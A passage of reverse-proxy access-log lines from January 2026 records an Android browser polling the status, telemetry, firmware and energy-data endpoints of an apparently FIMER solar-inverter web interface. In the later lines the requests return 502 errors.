Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:41 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:41 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.46.26] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.46.26] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.46.26] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.46.26] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.46.26] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.46.26] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.46.26] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.46.26] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:13:51:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.46.26] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.56] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.47.56] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.56] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.56] [Length 1680] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.56] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.47.56] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.47.56] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.47.56] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.47.56] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.47.56] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.56] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.47.56] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:36 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768517999999&bin=week_of_year&aggregation=diff" [Client 37.76.47.56] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:37 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768517999999&bin=month_of_year&aggregation=diff" [Client 37.76.47.56] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:37 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 37.76.47.56] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:37 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768517999999&bin=yearly&aggregation=diff" [Client 37.76.47.56] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:37 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.47.56] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:38 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.56] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[15/Jan/2026:14:25:38 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.56] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.16.110] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.16.110] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.16.110] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.16.110] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.16.110] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.16.110] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.16.110] [Length 1677] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 37.76.16.110] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.16.110] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.16.110] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.16.110] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.16.110] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 37.76.16.110] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.16.110] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.16.110] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.16.110] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.16.110] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.16.110] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.16.110] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:09:52:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.16.110] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.21.87] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.21.87] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.21.87] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.21.87] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.21.87] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.21.87] [Length 1660] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.21.87] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.21.87] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.21.87] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 37.76.21.87] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.21.87] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.21.87] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.21.87] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 37.76.21.87] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.21.87] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.21.87] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.21.87] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.21.87] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:56 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.21.87] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[16/Jan/2026:12:20:56 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.21.87] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[22/Jan/2026:23:03:43 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[22/Jan/2026:23:03:43 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[22/Jan/2026:23:03:43 +0000] - 502 502 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[24/Jan/2026:18:25:05 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[24/Jan/2026:18:25:05 +0000] - 502 502 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[24/Jan/2026:18:25:05 +0000] - 502 502 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.2.117] [Length 556] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" 